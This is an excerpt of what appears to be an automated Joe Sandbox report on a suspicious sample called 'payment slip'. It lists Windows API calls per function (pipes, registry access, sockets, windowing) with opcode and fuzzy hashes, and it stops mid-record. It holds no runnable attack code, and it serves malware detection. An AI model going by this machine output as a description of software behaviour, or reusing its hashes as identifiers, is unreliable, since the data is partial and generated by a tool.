                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CreateHandlePipe
                                        • String ID: nul
                                        • API String ID: 1424370930-2873401336
                                        • Opcode ID: e144bd6d780e7ef6f0fc94277ea3199f98446d3a755097ff66441de1647f0007
                                        • Instruction ID: c31d0442ae92182ce482e477d017adb979fc7b9bc52a6f1e67813b4b16bdfb05
                                        • Opcode Fuzzy Hash: e144bd6d780e7ef6f0fc94277ea3199f98446d3a755097ff66441de1647f0007
                                        • Instruction Fuzzy Hash: C6217E71900709EBEB209FB9DC44E9A7BF4AF46764F204A19F8A1D62E0D7709950CF20
                                        APIs
                                        • GetStdHandle.KERNEL32(000000F6), ref: 000A05C6
                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 000A0601
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CreateHandlePipe
                                        • String ID: nul
                                        • API String ID: 1424370930-2873401336
                                        • Opcode ID: 67cdbf6b46208c2c6ba1758bc2ac29968dd10161cc63a1d17963a569cb3fc2dc
                                        • Instruction ID: 590ca99bbc5f86c3c49170d3cb99760c2994cfaef040392aa4818c8403bdca32
                                        • Opcode Fuzzy Hash: 67cdbf6b46208c2c6ba1758bc2ac29968dd10161cc63a1d17963a569cb3fc2dc
                                        • Instruction Fuzzy Hash: 042135755003099BEB209FA9DC44E9A77E8BF96728F200B19F9A1E72D0D7719960CB50
                                        APIs
                                          • Part of subcall function 0003600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0003604C
                                          • Part of subcall function 0003600E: GetStockObject.GDI32(00000011), ref: 00036060
                                          • Part of subcall function 0003600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0003606A
                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 000C4112
                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 000C411F
                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 000C412A
                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 000C4139
                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 000C4145
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessageSend$CreateObjectStockWindow
                                        • String ID: Msctls_Progress32
                                        • API String ID: 1025951953-3636473452
                                        • Opcode ID: b6d360d942ae8071314a768e4125bc3af8d3de8dfdd1c03914a7a04513614adf
                                        • Instruction ID: 35d41f8b36995bb076711ad51b869363f17d3618c1969f07ed116030ce73e82c
                                        • Opcode Fuzzy Hash: b6d360d942ae8071314a768e4125bc3af8d3de8dfdd1c03914a7a04513614adf
                                        • Instruction Fuzzy Hash: 1F1190B2140219BEFF218F64CC86EEB7F9DFF08798F008111FB58A6050C6769C619BA4
                                        APIs
                                          • Part of subcall function 0006D7A3: _free.LIBCMT ref: 0006D7CC
                                        • _free.LIBCMT ref: 0006D82D
                                          • Part of subcall function 000629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000), ref: 000629DE
                                          • Part of subcall function 000629C8: GetLastError.KERNEL32(00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000,00000000), ref: 000629F0
                                        • _free.LIBCMT ref: 0006D838
                                        • _free.LIBCMT ref: 0006D843
                                        • _free.LIBCMT ref: 0006D897
                                        • _free.LIBCMT ref: 0006D8A2
                                        • _free.LIBCMT ref: 0006D8AD
                                        • _free.LIBCMT ref: 0006D8B8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                        • Instruction ID: be38ad5e4142b1e2cb31be17c16b0663645a5ad658ad6024bdd4aee2922864f3
                                        • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                        • Instruction Fuzzy Hash: 57115B71B44B04AADA21BFB0CC47FCF7BDEAF40700F440826B299A6093EA65B5058662
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0009DA74
                                        • LoadStringW.USER32(00000000), ref: 0009DA7B
                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0009DA91
                                        • LoadStringW.USER32(00000000), ref: 0009DA98
                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0009DADC
                                        Strings
                                        • %s (%d) : ==> %s: %s %s, xrefs: 0009DAB9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: HandleLoadModuleString$Message
                                        • String ID: %s (%d) : ==> %s: %s %s
                                        • API String ID: 4072794657-3128320259
                                        • Opcode ID: cfc93ad96c4c04c67fc34fc56405f467f45045a1c810108701c467921fdd5dbf
                                        • Instruction ID: b8d2df8cf751f8701105f5fa7ec7718fed04db13dc119f690d02fc3686e6a65b
                                        • Opcode Fuzzy Hash: cfc93ad96c4c04c67fc34fc56405f467f45045a1c810108701c467921fdd5dbf
                                        • Instruction Fuzzy Hash: 360162F25002087FFB10ABA4DD89EEB336CE708301F440496F74AE2041EA789E845F75
                                        APIs
                                        • InterlockedExchange.KERNEL32(00E1FE68,00E1FE68), ref: 000A097B
                                        • EnterCriticalSection.KERNEL32(00E1FE48,00000000), ref: 000A098D
                                        • TerminateThread.KERNEL32(00000000,000001F6), ref: 000A099B
                                        • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 000A09A9
                                        • CloseHandle.KERNEL32(00000000), ref: 000A09B8
                                        • InterlockedExchange.KERNEL32(00E1FE68,000001F6), ref: 000A09C8
                                        • LeaveCriticalSection.KERNEL32(00E1FE48), ref: 000A09CF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                        • String ID:
                                        • API String ID: 3495660284-0
                                        • Opcode ID: 8e9f767eadc0529b8b221b366c14b672ae731f4c9862dde186ec3482a5aa255b
                                        • Instruction ID: f727891f7544705724359d98f1d3c60d17aba02aa6ef717d822668f806153663
                                        • Opcode Fuzzy Hash: 8e9f767eadc0529b8b221b366c14b672ae731f4c9862dde186ec3482a5aa255b
                                        • Instruction Fuzzy Hash: 72F0EC32442A12BBF7515FA4EE8DFD6BB79FF06702F442025F206908A1C7799565CF90
                                        APIs
                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 000B1DC0
                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 000B1DE1
                                        • WSAGetLastError.WSOCK32 ref: 000B1DF2
                                        • htons.WSOCK32(?,?,?,?,?), ref: 000B1EDB
                                        • inet_ntoa.WSOCK32(?), ref: 000B1E8C
                                          • Part of subcall function 000939E8: _strlen.LIBCMT ref: 000939F2
                                          • Part of subcall function 000B3224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,000AEC0C), ref: 000B3240
                                        • _strlen.LIBCMT ref: 000B1F35
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                        • String ID:
                                        • API String ID: 3203458085-0
                                        • Opcode ID: 907e112911d67a2603a85ceecf9c5d47d7ed811a422f74e3a768df0637d8fcc9
                                        • Instruction ID: 8b2e81d4557a6ca366ecc5c0d8fe1f31effa627416de70a70080941f5ebafcde
                                        • Opcode Fuzzy Hash: 907e112911d67a2603a85ceecf9c5d47d7ed811a422f74e3a768df0637d8fcc9
                                        • Instruction Fuzzy Hash: F7B1DE70204301AFD324DF24C895FAA7BE9AF84318F94895CF55A5B2A3CB71ED46CB91
                                        APIs
                                        • GetClientRect.USER32(?,?), ref: 00035D30
                                        • GetWindowRect.USER32(?,?), ref: 00035D71
                                        • ScreenToClient.USER32(?,?), ref: 00035D99
                                        • GetClientRect.USER32(?,?), ref: 00035ED7
                                        • GetWindowRect.USER32(?,?), ref: 00035EF8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Rect$Client$Window$Screen
                                        • String ID:
                                        • API String ID: 1296646539-0
                                        • Opcode ID: 0698ec5e8c03b4ed0f633db73fcf6e80661079cb98a41d1c379efd742fb21d23
                                        • Instruction ID: a2683ce77ea0532d100ed37fc500bb3238098f41cc69d07f8700c9d991b65f86
                                        • Opcode Fuzzy Hash: 0698ec5e8c03b4ed0f633db73fcf6e80661079cb98a41d1c379efd742fb21d23
                                        • Instruction Fuzzy Hash: EDB18B35A0074ADBDB64CFA8C8807EEB7F5FF48311F14841AE8A9D7260DB34AA51DB54
                                        APIs
                                        • __allrem.LIBCMT ref: 000600BA
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000600D6
                                        • __allrem.LIBCMT ref: 000600ED
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0006010B
                                        • __allrem.LIBCMT ref: 00060122
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00060140
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                        • String ID:
                                        • API String ID: 1992179935-0
                                        • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                        • Instruction ID: 4d77bd61b663accc678d9751e3a0c2552aca8d2d12cd9714b42d5fc2f3f33ec9
                                        • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                        • Instruction Fuzzy Hash: 83811872A40706ABE7209F78CC41BAB73EAAF41324F24453EF955DB6C2E774D9448790
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,000582D9,000582D9,?,?,?,0006644F,00000001,00000001,8BE85006), ref: 00066258
                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0006644F,00000001,00000001,8BE85006,?,?,?), ref: 000662DE
                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 000663D8
                                        • __freea.LIBCMT ref: 000663E5
                                          • Part of subcall function 00063820: RtlAllocateHeap.NTDLL(00000000,?,00101444,?,0004FDF5,?,?,0003A976,00000010,00101440,000313FC,?,000313C6,?,00031129), ref: 00063852
                                        • __freea.LIBCMT ref: 000663EE
                                        • __freea.LIBCMT ref: 00066413
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                        • String ID:
                                        • API String ID: 1414292761-0
                                        • Opcode ID: 8ce244acdae8ed960616c08ff98aff6047be5804d1efdbec35df3e6c98a7257d
                                        • Instruction ID: cbd1560ff7d8335ab52a44faf572cce14d657d990a7c445426dcce90d317b4bf
                                        • Opcode Fuzzy Hash: 8ce244acdae8ed960616c08ff98aff6047be5804d1efdbec35df3e6c98a7257d
                                        • Instruction Fuzzy Hash: E551D372A00226ABEB258F64CC81EBF77ABEF45750F154629FD05D7241EB36DE40C6A0
                                        APIs
                                          • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                          • Part of subcall function 000BC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000BB6AE,?,?), ref: 000BC9B5
                                          • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BC9F1
                                          • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BCA68
                                          • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BCA9E
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000BBCCA
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000BBD25
                                        • RegCloseKey.ADVAPI32(00000000), ref: 000BBD6A
                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 000BBD99
                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 000BBDF3
                                        • RegCloseKey.ADVAPI32(?), ref: 000BBDFF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                        • String ID:
                                        • API String ID: 1120388591-0
                                        • Opcode ID: 486c7a4d749051543be806b3a5538e28a39ebfbe454e5ff2031853443c250238
                                        • Instruction ID: 099fe6a70b12a000cc99c8976a5b00bd5e6bc0e47a73931a6dab04a9ab4f19fd
                                        • Opcode Fuzzy Hash: 486c7a4d749051543be806b3a5538e28a39ebfbe454e5ff2031853443c250238
                                        • Instruction Fuzzy Hash: DA81D270208241EFD715DF24C885EAABBE9FF84308F54895CF4994B2A2DB71ED45CB92
                                        APIs
                                        • VariantInit.OLEAUT32(00000035), ref: 0008F7B9
                                        • SysAllocString.OLEAUT32(00000001), ref: 0008F860
                                        • VariantCopy.OLEAUT32(0008FA64,00000000), ref: 0008F889
                                        • VariantClear.OLEAUT32(0008FA64), ref: 0008F8AD
                                        • VariantCopy.OLEAUT32(0008FA64,00000000), ref: 0008F8B1
                                        • VariantClear.OLEAUT32(?), ref: 0008F8BB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Variant$ClearCopy$AllocInitString
                                        • String ID:
                                        • API String ID: 3859894641-0
                                        • Opcode ID: c0f3898cbbcc9d65fa733fe506819847343e87198b0a47ed71c4a54a7cd86ec1
                                        • Instruction ID: 0051a7dd34c2c9868658e2387f5309169dac5853808b4ca6d963b30d50a391cc
                                        • Opcode Fuzzy Hash: c0f3898cbbcc9d65fa733fe506819847343e87198b0a47ed71c4a54a7cd86ec1
                                        • Instruction Fuzzy Hash: E351D131600312BADF24BB75D895B7DB3A9FF45310F208466E986DF292DB708C40CBA6
                                        APIs
                                          • Part of subcall function 00037620: _wcslen.LIBCMT ref: 00037625
                                          • Part of subcall function 00036B57: _wcslen.LIBCMT ref: 00036B6A
                                        • GetOpenFileNameW.COMDLG32(00000058), ref: 000A94E5
                                        • _wcslen.LIBCMT ref: 000A9506
                                        • _wcslen.LIBCMT ref: 000A952D
                                        • GetSaveFileNameW.COMDLG32(00000058), ref: 000A9585
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _wcslen$FileName$OpenSave
                                        • String ID: X
                                        • API String ID: 83654149-3081909835
                                        • Opcode ID: e44f4978c4404dc7d9162c68a826e8f1b9e66498df6fe290b1ffd41aade5f4f5
                                        • Instruction ID: ed5105caf5386126a1abee5de1267f72daf6515aec977b47cfae8dc4ee114f6c
                                        • Opcode Fuzzy Hash: e44f4978c4404dc7d9162c68a826e8f1b9e66498df6fe290b1ffd41aade5f4f5
                                        • Instruction Fuzzy Hash: 39E1A271A083019FD725DF64C881BAEB7E4BF85314F14896DF8899B2A2DB31DD05CB92
                                        APIs
                                          • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                        • BeginPaint.USER32(?,?,?), ref: 00049241
                                        • GetWindowRect.USER32(?,?), ref: 000492A5
                                        • ScreenToClient.USER32(?,?), ref: 000492C2
                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 000492D3
                                        • EndPaint.USER32(?,?,?,?,?), ref: 00049321
                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 000871EA
                                          • Part of subcall function 00049339: BeginPath.GDI32(00000000), ref: 00049357
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                        • String ID:
                                        • API String ID: 3050599898-0
                                        • Opcode ID: 77dd61041869993c5964b6a6384827e8594cc69771c22a3ee08f7fabbb63dd20
                                        • Instruction ID: 084ac152a72a7c5693e5d0b2cfd33a2f6bc65c65f329fd1059e8369fb663974f
                                        • Opcode Fuzzy Hash: 77dd61041869993c5964b6a6384827e8594cc69771c22a3ee08f7fabbb63dd20
                                        • Instruction Fuzzy Hash: B8419F70104200AFE721DF24CC88FAB7BE8FB4A325F140679F998876A2C7759985DB61
                                        APIs
                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 000A080C
                                        • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 000A0847
                                        • EnterCriticalSection.KERNEL32(?), ref: 000A0863
                                        • LeaveCriticalSection.KERNEL32(?), ref: 000A08DC
                                        • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 000A08F3
                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 000A0921
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                        • String ID:
                                        • API String ID: 3368777196-0
                                        • Opcode ID: 186d8086c84d6fd554c65fcf475c285b463a78979bc638a37779a184d388d51f
                                        • Instruction ID: 71259f09b0bc7c67c83d5b6d8c6510bc64e90561b43ce635db7e6e8edfdcf5cc
                                        • Opcode Fuzzy Hash: 186d8086c84d6fd554c65fcf475c285b463a78979bc638a37779a184d388d51f
                                        • Instruction Fuzzy Hash: EF417C71900209EFEF149F94DC85AAAB7B8FF05310F1440B9ED049A297DB34DE65DBA4
                                        APIs
                                        • IsWindowVisible.USER32(?), ref: 00094C95
                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00094CB2
                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00094CEA
                                        • _wcslen.LIBCMT ref: 00094D08
                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00094D10
                                        • _wcsstr.LIBVCRUNTIME ref: 00094D1A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                        • String ID:
                                        • API String ID: 72514467-0
                                        • Opcode ID: 6b0d941d3c7f69c40bb0f3571511f669e80d2f5294a75253e32957096004bec6
                                        • Instruction ID: e5fb9e37c81d5dd5043aaecb2a0de297d0f4b1db03d7578f3acb23c3500075d8
